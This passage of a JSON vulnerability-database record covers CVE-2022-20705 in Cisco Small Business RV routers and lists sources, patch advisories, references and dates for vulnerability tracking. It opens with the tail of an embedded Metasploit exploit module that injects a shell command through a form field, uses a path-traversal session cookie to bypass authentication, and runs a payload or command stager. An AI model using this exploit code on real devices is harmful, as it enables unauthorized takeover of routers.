so we just use the temporary upload file to prevent issues. \n    pathparam = \u0027Configuration\u0027\n\n    destination = \"\u0027; \" + cmd + \u0027 #\u0027\n\n    multipart_form = Rex::MIME::Message.new\n    multipart_form.add_part(filepath, nil, nil, \u0027form-data; name=\"file.path\"\u0027)\n    multipart_form.add_part(filename, nil, nil, \u0027form-data; name=\"filename\"\u0027)\n    multipart_form.add_part(pathparam, nil, nil, \u0027form-data; name=\"pathparam\"\u0027)\n    multipart_form.add_part(fileparam, nil, nil, \u0027form-data; name=\"fileparam\"\u0027)\n    multipart_form.add_part(destination, nil, nil, \u0027form-data; name=\"destination\"\u0027)\n    multipart_form.add_part(input, \u0027application/octet-stream\u0027, nil, format(\u0027form-data; name=\"input\"; filename=\"%\u003cfilename\u003es\"\u0027, filename: filename))\n\n    # Escaping \"/tmp/upload/\" folder that does not contain any other permanent files\n    send_request_cgi({\n      \u0027method\u0027 =\u003e \u0027POST\u0027,\n      \u0027uri\u0027 =\u003e \u0027/upload\u0027,\n      \u0027ctype\u0027 =\u003e \"multipart/form-data; boundary=#{multipart_form.bound}\",\n      \u0027headers\u0027 =\u003e {\n        \u0027Cookie\u0027 =\u003e \u0027sessionid =../../www/index.html; sessionid=\u0027 + sessionid\n      },\n      \u0027data\u0027 =\u003e multipart_form.to_s\n    }, 10)\n  end\n\n  def exploit\n    print_status(\"Executing #{target.name} for #{datastore[\u0027PAYLOAD\u0027]}\")\n    case target[\u0027Type\u0027]\n    when :unix_cmd\n      execute_command(payload.encoded)\n    when :linux_dropper\n      execute_cmdstager(linemax: 120)\n    end\n  end\nend\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-20705"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-004459"
      },
      {
        "db": "ZDI",
        "id": "ZDI-22-415"
      },
      {
        "db": "ZDI",
        "id": "ZDI-22-410"
      },
      {
        "db": "ZDI",
        "id": "ZDI-22-409"
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-20705"
      },
      {
        "db": "PACKETSTORM",
        "id": "170988"
      }
    ],
    "trust": 3.69
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2022-20705",
        "trust": 5.5
      },
      {
        "db": "ZDI",
        "id": "ZDI-22-415",
        "trust": 2.4
      },
      {
        "db": "ZDI",
        "id": "ZDI-22-410",
        "trust": 2.4
      },
      {
        "db": "ZDI",
        "id": "ZDI-22-409",
        "trust": 2.4
      },
      {
        "db": "PACKETSTORM",
        "id": "170988",
        "trust": 1.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-004459",
        "trust": 0.8
      },
      {
        "db": "ZDI_CAN",
        "id": "ZDI-CAN-15848",
        "trust": 0.7
      },
      {
        "db": "ZDI_CAN",
        "id": "ZDI-CAN-15882",
        "trust": 0.7
      },
      {
        "db": "ZDI_CAN",
        "id": "ZDI-CAN-15610",
        "trust": 0.7
      },
      {
        "db": "CS-HELP",
        "id": "SB2022020301",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202202-166",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-20705",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-22-415"
      },
      {
        "db": "ZDI",
        "id": "ZDI-22-410"
      },
      {
        "db": "ZDI",
        "id": "ZDI-22-409"
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-20705"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-004459"
      },
      {
        "db": "PACKETSTORM",
        "id": "170988"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202202-166"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-20705"
      }
    ]
  },
  "id": "VAR-202202-0325",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.18174963
  },
  "last_update_date": "2024-02-13T01:29:02.464000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Cisco has issued an update to correct this vulnerability.",
        "trust": 2.1,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d"
      },
      {
        "title": "cisco-sa-smb-mult-vuln-KA9PK6D",
        "trust": 0.8,
        "url": "https://sec.cloudapps.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d"
      },
      {
        "title": "Cisco Small Business Buffer error vulnerability fix",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=182405"
      },
      {
        "title": "Cisco: Cisco Small Business RV Series Routers Vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-smb-mult-vuln-ka9pk6d"
      },
      {
        "title": "https://github.com/20142995/Goby",
        "trust": 0.1,
        "url": "https://github.com/20142995/goby "
      },
      {
        "title": "Goby_POC\nPOC \u6570\u91cf1319",
        "trust": 0.1,
        "url": "https://github.com/z0fhack/goby_poc "
      },
      {
        "title": "CVE-2022-XXXX",
        "trust": 0.1,
        "url": "https://github.com/alphabugx/cve-2022-23305 "
      },
      {
        "title": "CVE-2022-XXXX",
        "trust": 0.1,
        "url": "https://github.com/alphabugx/cve-2022-rce "
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-22-415"
      },
      {
        "db": "ZDI",
        "id": "ZDI-22-410"
      },
      {
        "db": "ZDI",
        "id": "ZDI-22-409"
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-20705"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-004459"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202202-166"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-787",
        "trust": 1.0
      },
      {
        "problemtype": "Out-of-bounds writing (CWE-787) [NVD evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-004459"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-20705"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.8,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d"
      },
      {
        "trust": 2.3,
        "url": "https://www.zerodayinitiative.com/advisories/zdi-22-415/"
      },
      {
        "trust": 1.8,
        "url": "https://www.zerodayinitiative.com/advisories/zdi-22-410/"
      },
      {
        "trust": 1.8,
        "url": "http://packetstormsecurity.com/files/170988/cisco-rv-series-authentication-bypass-command-injection.html"
      },
      {
        "trust": 1.7,
        "url": "https://www.zerodayinitiative.com/advisories/zdi-22-409/"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-20705"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022020301"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/787.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv340_lan/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-20707"
      },
      {
        "trust": 0.1,
        "url": "https://metasploit.com/download"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/rapid7/metasploit-framework"
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-22-415"
      },
      {
        "db": "ZDI",
        "id": "ZDI-22-410"
      },
      {
        "db": "ZDI",
        "id": "ZDI-22-409"
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-20705"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-004459"
      },
      {
        "db": "PACKETSTORM",
        "id": "170988"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202202-166"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-20705"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "ZDI",
        "id": "ZDI-22-415"
      },
      {
        "db": "ZDI",
        "id": "ZDI-22-410"
      },
      {
        "db": "ZDI",
        "id": "ZDI-22-409"
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-20705"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-004459"
      },
      {
        "db": "PACKETSTORM",
        "id": "170988"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202202-166"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-20705"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-02-22T00:00:00",
        "db": "ZDI",
        "id": "ZDI-22-415"
      },
      {
        "date": "2022-02-22T00:00:00",
        "db": "ZDI",
        "id": "ZDI-22-410"
      },
      {
        "date": "2022-02-22T00:00:00",
        "db": "ZDI",
        "id": "ZDI-22-409"
      },
      {
        "date": "2022-02-10T00:00:00",
        "db": "VULMON",
        "id": "CVE-2022-20705"
      },
      {
        "date": "2023-04-12T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2022-004459"
      },
      {
        "date": "2023-02-14T15:32:53",
        "db": "PACKETSTORM",
        "id": "170988"
      },
      {
        "date": "2022-02-03T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202202-166"
      },
      {
        "date": "2022-02-10T18:15:09.307000",
        "db": "NVD",
        "id": "CVE-2022-20705"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-02-22T00:00:00",
        "db": "ZDI",
        "id": "ZDI-22-415"
      },
      {
        "date": "2022-02-22T00:00:00",
        "db": "ZDI",
        "id": "ZDI-22-410"
      },
      {
        "date": "2022-02-22T00:00:00",
        "db": "ZDI",
        "id": "ZDI-22-409"
      },
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2022-20705"
      },
      {
        "date": "2023-04-12T07:15:00",
        "db": "JVNDB",
        "id": "JVNDB-2022-004459"
      },
      {
        "date": "2023-02-15T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202202-166"
      },
      {
        "date": "2023-11-07T03:42:40.710000",
        "db": "NVD",
        "id": "CVE-2022-20705"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202202-166"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 series router \u00a0 Out-of-bounds write vulnerability in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-004459"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "buffer error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202202-166"
      }
    ],
    "trust": 0.6
  }
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading...

Loading...

Loading...

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.